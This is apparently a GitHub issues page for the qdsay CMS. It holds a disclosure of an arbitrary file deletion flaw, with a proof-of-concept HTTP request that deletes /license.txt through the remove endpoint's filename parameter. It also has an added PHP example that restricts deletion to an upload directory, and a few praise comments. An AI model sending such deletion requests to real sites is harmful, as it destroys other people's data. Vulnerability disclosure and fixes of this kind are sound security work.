
qdsay / cms


勤道CMS is not only a minimalist content management system but also a basic PHP development framework that covers the class libraries most commonly used in day-to-day development. It also provides a highly configurable scaffolding program (code generator) for quickly building the CRUD programs of a content management system.

Home Page: http://www.qdsay.com

License: MIT License

ApacheConf 0.01% PHP 58.10% HTML 2.15% Smarty 1.83% CSS 2.96% JavaScript 34.70% PLpgSQL 0.25%

cms's Issues

QDSAY cms has an arbitrary file deletion vulnerability in the remove function in application\backend\core\QD_Controller.php

The function remove does not limit the filename to be deleted, so I can delete any file.
POC:


GET /backend/article/remove?filename=%2Flicense.txt HTTP/1.1
Host: localhost
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
DNT: 1
Referer: http://localhost/backend/article/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1531379042; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9cG9zdHMmaWQ9MQ%3D%3D; greencms_post_add1=x%9C%85%8FK%0B%C20%10%84%FF%8A%EC%C1S%C5%24%B4M%8D%E2%C5%83%27O%1E%8DH%1Fi%0D%D44%98%CDA%C4%FFnJ%7D%80%82%9E%96%99%FDf%97%B9%82%ED%1C%1EPc%AB%40%80%F4i%C1%98%F4Y%5D%2A%E9%E3%9A%D7%D2%F3%84e%EB%B3Rf%B5%D9B4%F0egP%19%0C%89%85%5D%8EM%E1%EC%7C%F4%7F%F4%17S%22%7D2%E3U%14%84%A2i%7F%3E.%7F%85%16rj%97%E1o%99%A3%03%B1%03%0A%FB%080o%DEbhp%B1%7D%01%A7M%13%9A%3CL%879%FA%00%82%F5E%AB%DD%F1%E9%A3%3A%D96%C7%EF%00v6x%E4%29%AB%81a%84f%13%C2%27%94%8Dh%22%E8L%D0%17q%EA%2A%5DkU%7DP%A9+%5C%C4%2FJ%F7%7B%0A%B7%3B%29%BCqm; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1532595699; tm=20e0109ed56458f613d642c25308ebcc; ci_session=f381a36b9806873709c66b7841b4bae32054f2cc
Connection: close

I hope you can fix this vulnerability.
author by: [email protected]
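The report above describes a remove action that hands a caller-supplied filename straight to deletion, so an absolute path such as /license.txt (or a ../ traversal) escapes the directory the feature was meant for. The block below is an added example, not code from the qdsay/cms project, showing one defensive pattern: canonicalise the requested name with realpath() and delete only when the result still sits under a fixed upload directory. The function names (resolveInsideBase, safeRemove), the temporary upload directory and the sample files are assumptions constructed for illustration.

```php
<?php
// Added example (not qdsay/cms code): confine file deletion to one upload root.
// All names and the temporary files below are assumptions for illustration.

declare(strict_types=1);

/**
 * Resolve $filename relative to $baseDir and return the canonical path
 * only if it stays inside $baseDir and is a regular file; otherwise null.
 */
function resolveInsideBase(string $baseDir, string $filename): ?string
{
    // Reject empty names, NUL bytes and anything that looks like an absolute path.
    if ($filename === '' || strpos($filename, "\0") !== false) {
        return null;
    }
    if ($filename[0] === '/' || $filename[0] === '\\' || preg_match('/^[A-Za-z]:/', $filename)) {
        return null;
    }
    // Allow-list the characters in the name; this is easier to reason about
    // than trying to strip "../" sequences (and realpath() below still decides).
    if (!preg_match('#^[A-Za-z0-9_\-./]+$#', $filename)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $filename);
    if ($target === false) {
        return null; // does not exist, nothing to delete
    }
    // The canonical target must start with the canonical base plus a separator,
    // so "/uploads" is not fooled by a sibling such as "/uploads_private/...".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($target) ? $target : null;
}

/** Delete $filename under $baseDir; returns false (and logs) for anything rejected. */
function safeRemove(string $baseDir, string $filename): bool
{
    $path = resolveInsideBase($baseDir, $filename);
    if ($path === null) {
        error_log("rejected delete request for '{$filename}'"); // audit trail for monitoring
        return false;
    }
    return unlink($path);
}

// Self-contained demo on constructed temporary files.
$base = sys_get_temp_dir() . '/uploads_' . bin2hex(random_bytes(4));
mkdir($base . '/img', 0700, true);
file_put_contents($base . '/img/photo.jpg', 'jpeg-bytes');
$outside = sys_get_temp_dir() . '/license_' . bin2hex(random_bytes(4)) . '.txt';
file_put_contents($outside, 'MIT');

var_dump(safeRemove($base, '/license.txt'));             // absolute path, as in the report
var_dump(safeRemove($base, '../' . basename($outside))); // traversal out of the upload root
var_dump(safeRemove($base, 'img/photo.jpg'));            // legitimate file inside the root
var_dump(file_exists($outside));                         // the file outside the root

// Clean up the demo files.
unlink($outside);
rmdir($base . '/img');
rmdir($base);
```

The two checks complement each other: the character allow-list blocks obviously malformed input early, while the realpath() prefix comparison is the actual security boundary, since it also handles symlinks and repeated separators that a pattern-based filter would miss. The allow-list is deliberately strict and would need widening for non-ASCII filenames.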

Good Project

Very Good!!!

Great Project!!!

I am in awe of you, Brother Xing!!!
